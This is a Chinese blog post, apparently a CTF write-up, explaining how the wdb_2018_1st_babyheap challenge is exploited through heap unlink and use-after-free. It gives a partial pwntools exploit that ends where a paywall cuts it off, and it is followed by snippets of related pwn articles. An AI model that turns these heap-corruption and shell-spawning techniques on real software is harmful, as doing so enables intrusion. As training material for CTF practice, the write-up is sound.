BUUCTF-PWN刷题记录-21

最新推荐文章于 2025-04-23 00:08:14 发布
最新推荐文章于 2025-04-23 00:08:14 发布
阅读量763 收藏
点赞数
分类专栏: BUU-PWN 文章标签: BUU pwn off-by-one heap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44145820/article/details/106059767
版权
本文详细记录了三个PWN类CTF挑战的解决过程,包括wdb_2018_1st_babyheap的unlink与UAF漏洞利用,asis2016_b00ks的off-by-null利用,以及ciscn_2019_n_4的off-by-one漏洞。通过添加、编辑和删除操作,操纵堆内存布局,实现权限提升。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

wdb_2018_1st_babyheap(unlink, UAF)

在这里插入图片描述
add的大小固定为0x20
在这里插入图片描述
edit机会只有三次
在这里插入图片描述
指针悬挂
在这里插入图片描述

利用思路如下:

  1. 进行几次添加
add(0, (p64(0)+p64(0x31))*2)
add(1, 'aaa\n')
add(2, 'aaa\n')
add(3, 'aaa\n')
add(4, '/bin/sh\n')
  1. 删除0和1,再删除一次0,此时show(0)能泄露出heap的地址
  2. 编辑0,修改fd为heap+0x10
  3. 进行一次添加,此时分配到0的地方,在其中伪造一个0x30大小的chunk,且fd为chunk0的地址
  4. 添加,此时能修改chunk1的size为0x91,pre_size为0x20,然后再利用添加把chunk0中伪造的chunk的size改为0x20,fd为0x602060-0x18,bk为0x602060-0x10
  5. 删除1,触发unlink,此时show(6)会泄露main_arena+0x58的地址,计算__free_hooksytem的地址,先在0x602060处写入__free_hook,然后编辑0写入system,删除4即可

Exp:

from pwn import *

r = remote("node3.buuoj.cn", 29610)
#r = process("./wdb_2018_1st_babyheap")

context(log_level = 'debug', arch = 'amd64', os = 'linux')
DEBUG = 0
if DEBUG:
	gdb.attach(r, 
	'''	
	b *0x400CF7
	x/10gx 0x602060
	c
	''')

elf = ELF("./wdb_2018_1st_babyheap")
libc = ELF('./libc/libc-2.23.so')
one_gadget_16 = [0x45216,0x4526a,0xf02a4,0xf1147]
bss_arr = 0x602060
read_got = elf.got['read']

menu = "Choice:"
def add(index, content):
	r.recvuntil(menu)
	r.sendline('1')
	r.recvuntil("Index:")
	r.sendline(str(index))
	r.recvuntil("Content:")
	r.send(content)

def delete(index):
	r.recvuntil(menu)
	r.sendline('4')
	r.recvuntil("Index:")
	r.sendline(str(index))


def edit(index, content):
	r.recvuntil(menu)
	r.sendline('2')
	r.recvuntil("Index:")
	r.sendline(str(index))
	r.recvuntil("Content:")
	r.send(content)

def show(index):
	r.recvuntil(menu)
	r.sendline('3')
	r.recvuntil("Index:")
	r.sendline(str(index
最低0.47元/天 解锁文章
pwn入门题——starting(1)
qq_44302282的博客
05-05 381
level0 题目来源:攻防世界—level0 链接:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5053&page=1 1、首先,执行基本步骤(前面已经说过了),看图 2、 接下来,打开64位的ida 3、在左边的函数窗口里面找到main函数,打开它,tab键可以切换反...
BUUCTF-pwn题记(22-7-30更新)
Morphy_Amo的博客
03-04 4454
BUUCTF题记
攻防世界:PWN题(一)
m0_53932372的博客
12-30 1672
cgpwn2 32bit,漏洞:栈溢出 这题很简单,第一次输入参数“/bin/sh”到一个bss区域,第二次利用栈溢出getshell exp: from pwn import * io = remote('111.200.241.244',61742) sys_addr = 0x08048420 io.recvuntil("your name\n") io.sendline("/bin/sh") bin_sh_addr =0x0804A080 io.recvuntil("leave some messag
pwn_recording(buuctf2-6)
最新发布
xcellencw的博客
04-23 701
checksecIDA64打开,shift+F12查看有system函数和/bin/sh如何查看他们的位置呢?两种点击fun函数进去 /bin/sh 0x40118A以下才是它libc中的地址(动态),而用ROPgadget --binary rip --string '/bin/sh'查的是静态地址填充数据如何算呢?这里推荐①cyclic 200,先创建200个数据;②pwndbg > run ,在pwndbg中运行程序;运行到如下图所示。
PWN入门题——BUUCTF(1-4)
ChenD的学习笔记
09-23 807
最近为了学校组织的ctf比赛才开始接触pwn的刚刚做了十多道题现在来记一下,记完了接着学后面贼难的内容!
BUUCTF PWN 题 1-15题
农夫果园好好喝的博客
08-21 2412
经典栈溢出漏洞。
BUUCTF-PWN题记-14
weixin_44145820的博客
04-29 878
sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这题原题目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这题应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
BUUCTF-PWN题记25(IO file attack)
weixin_44145820的博客
08-14 1732
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
BUUCTF-PWN题记-22
weixin_44145820的博客
05-18 781
ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 494
buuctf-pwn 001-016题wp
BUUCTF PWN题记 (未完待续)
qq_41071646的博客
08-01 2082
最近找了一个新的CTF比赛平台 但是不知道为啥pwn的服务器总是连不上, 所以到时候还是直接本地打 默认2.23 so 如果 有高版本的话 我再切换,,, 逆向的话 先等等吧,,,先不。。等有空了再 第一题 连上就有flag的pwn 直接 运行就有权限,。 第二题 RIP覆盖一下 这个没有任何保护 直接 覆盖rip就可以了 from pwn import * conte...
buuctf——pwn题之旅(持续更新)
qq_42988973的博客
12-16 657
buuctf-pwn 的一些wp
Pwn题记(不停更新)
qq_66013948的博客
06-23 464
​ 发现了个事儿,for循环会执行两次,所以这里采用第一次不溢出,通过格式化字符串漏洞对Canary的值进行泄露,之后就可以在合适的地方填入canary的值来绕过canary保护了。​ 之后就是具体进行溢出了,计算溢出的长度也比较简单,这里直接上答案吧,116字节,不过,第100到104为canary的值。​ 根据这俩进行计算,可得到偏移,结果是0x7c/4=31。​ 除了NX之外,似乎就只有 Canary了。​ 因此,思路就很明确了。
PWN题记(1)--ciscn_2019_n_5
小心信科理化声
05-10 390
这是第一篇的题记,从ret2text开始起 0x1 程序分析 先checksec 一下 64位的小端序,NX没开启,妥妥的写shellcode 拖入IDA中查看一下 main函数如下 可以看到gets(text)有明显的溢出 然后还可以看到关键的read函数,可以做libc泄露用,先留着 然后查找一下有没有能用到的system函数和binsh 无system函数 估计也没有binsh了 咋办呢>? 看一下有没有可读可写可执行的字段呢? 看看这里的两个变量:name\text 存在!
攻防世界pwn题笔记(实时更新)
zzh258369的博客
02-27 593
学了点逆向又来接触点pwn方面的题,现在学习效率有点低下,需要再不断提高Pwn是指攻击者通过漏洞利用技术,获取目标系统或程序的控制权,进而执行任意代码、窃取数据等恶意操作,以达到破坏系统安全、获取敏感信息等目的的行为过程。比如攻击者利用软件中的缓冲区溢出漏洞,改写程序的执行流程,让程序执行攻击者预先准备好的恶意代码。具体相关描述后面遇到会详细解释作为引导模式的第一题,一看难度竟然是7,一下子就慌了,但是事实上这道题很简单下载好后放入虚拟机里,先简单逆向分析一下,没发现任何东西其实就简单linux指令。
NSSCTF PWN方向题记
CyhStyrl的博客
04-03 903
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
pwn入门题——starting
qq_44302282的博客
05-04 1786
运行就能拿到shell呢,真的 题目来源:攻防世界------运行就能拿到shell呢,真的 链接:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5049&page=1 先从最简单的题入手(虽然我先的不是这道题,emmmm) (作为小白,刚开始的这些步骤我真的不知道,所以我...
我又pwn了 ——题篇 ciscn_s_3
m0_64195960的博客
08-08 668
ret2csu&SROP
buuctf-pwn入门
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote('example.com', 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b'A' * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值